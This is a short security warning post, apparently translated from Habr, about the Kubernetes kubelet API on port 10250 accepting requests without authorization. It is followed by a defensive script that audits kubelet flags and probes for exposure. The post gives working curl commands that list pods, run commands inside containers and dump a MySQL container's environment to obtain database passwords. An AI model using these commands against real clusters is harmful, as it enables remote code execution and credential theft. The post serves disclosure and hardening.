
Caution for Kubernetes Users

The kubelet service, with which the apiserver communicates closely, listens on port 10250. Although this port uses certificates, they serve only to encrypt the channel; there is no authorization on it.


This problem has been known for a long time, but for some reason no one considers it serious. Links to the discussion:



What can be done with this? Almost everything. No registration, no SMS.


Get a list of all pods:


 $ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool 

Run a command inside a container? Easily:


 $ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /" 

Get a password to the database? Easy peasy:


 $ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env' 

Pulling data out of it is also not difficult.
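
A defender-side check for the exposure described above, as an added example that is not part of the original article. It assumes the kubelet is configured through the command-line flags `--anonymous-auth`, `--authorization-mode` and `--client-ca-file` (real kubelet flags the article does not mention); the function names and the sample command lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): audit a kubelet for the
# unauthenticated API on port 10250. Assumes flag-based configuration;
# settings in a --config file are not inspected.

# Constructed sample command lines, for offline use.
SAMPLE_WEAK='kubelet --kubeconfig=/etc/kubernetes/kubelet.conf'
SAMPLE_HARDENED='kubelet --anonymous-auth=false --authorization-mode=Webhook --client-ca-file=/etc/kubernetes/pki/ca.crt'

# Report which hardening flags are missing from a kubelet command line.
audit_kubelet_args() (
  args=" $1 "; findings=""
  add() { findings="${findings:+$findings }$1"; }
  case "$args" in *" --anonymous-auth=false "*) ;; *) add anonymous-auth-not-disabled ;; esac
  case "$args" in *" --authorization-mode=Webhook "*) ;; *) add authorization-not-webhook ;; esac
  case "$args" in *" --client-ca-file=/"*) ;; *) add no-client-ca ;; esac
  echo "${findings:-ok}"
)

# Interpret the HTTP status of an unauthenticated request to the kubelet.
classify_status() {
  case "$1" in
    200) echo EXPOSED ;;          # served without credentials
    401|403) echo PROTECTED ;;    # authentication or authorization refused it
    000) echo UNREACHABLE ;;      # curl could not connect
    *) echo UNKNOWN ;;
  esac
}

# With --live, run on the node itself: audit the running kubelet's flags and
# confirm with one credential-less request to the local port.
if [ "${1:-}" = "--live" ]; then
  pid=$(pgrep -x kubelet | head -n 1)
  [ -n "$pid" ] || { echo "kubelet not running" >&2; exit 1; }
  echo "flags: $(audit_kubelet_args "$(tr '\0' ' ' < "/proc/$pid/cmdline")")"
  code=$(curl -sk -o /dev/null -m 5 -w '%{http_code}' https://127.0.0.1:10250/runningpods/) || true
  echo "probe: $(classify_status "${code:-000}")"
else
  echo "weak:     $(audit_kubelet_args "$SAMPLE_WEAK")"
  echo "hardened: $(audit_kubelet_args "$SAMPLE_HARDENED")"
fi
```

A result of `ok` from the flag audit together with `PROTECTED` from the probe means the requests shown earlier are refused without valid credentials.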



Source: https://habr.com/ru/post/308628/

